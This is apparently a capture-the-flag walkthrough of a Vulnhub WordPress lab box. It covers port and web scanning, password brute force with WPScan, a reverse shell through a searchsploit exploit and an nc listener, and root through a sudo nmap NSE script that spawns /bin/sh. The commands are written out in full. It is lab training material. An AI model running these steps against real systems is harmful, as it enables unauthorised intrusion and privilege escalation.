First we start by adding the host name to the /etc/hosts file as instructed on the site Vulnhub.com.
After running netdiscover and finding out the host ip we run nmap to scan the host for open ports:
Nmap –A –T4 –p- 192.168.1.5 –vv
Port 22 and port 80 are open so we enter the IP in the browser and see the webpage
We are redirected to a webpage http://wordy .. I use Wappalyzer and it shows that the page is using WordPress 5.1.1
Also lets run Nikto on the host IP 192.168.1.5
The site is running WordPress service and there is a login page
The name Jens Dagmeister could be useful ( it’s in the webpage) .
Also to cover all the bases lets run dirb
So as we said the page is running WordPress service scanning it with WPScan is the next step :
We got 5 names (admin-graham-mark-sarah-jens)
So now we can brute force the 5 names with rockyou.txt
“OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years.”
This advice from the creator of the lab to reduce the rockyou file to few passwords as from millions to only 2668 words.
Put all the usernames in a file save it and run the next command
wpscan –url http://wordy/ -P /root/passwords.txt -U /root/names.txt
a hit will come back from one of the users along with the password
And we inside wordpress dashboard
Searchsploit WordPress came with a few exploits , one of them is activity monitor which we have in here on this site
Copy the exploit file 45274.html and edit the IP , port and address
Open a nc –lvp 999 on your machine and open the html file on your explorer and a page with a button (Submit Request) , and as you press the button you will get a low privilege shell
CD to /home and mark found a file named thing-to-do.txt , viewing the file gave me another username and password
Ssh graham@192.168.1.5 with the provided password gave me a login to the account
Switching from garaham to using sudo –l , and viewing the files there is a bash file to run
Writing sudo –l shows a message that user jens can run “/usr/bin/nmap” without password ,so taking privilege using nmap we can run the following commands
echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse
sudo nmap –script=/tmp/shell.nse
CAT the theflag.txt and we done !!!
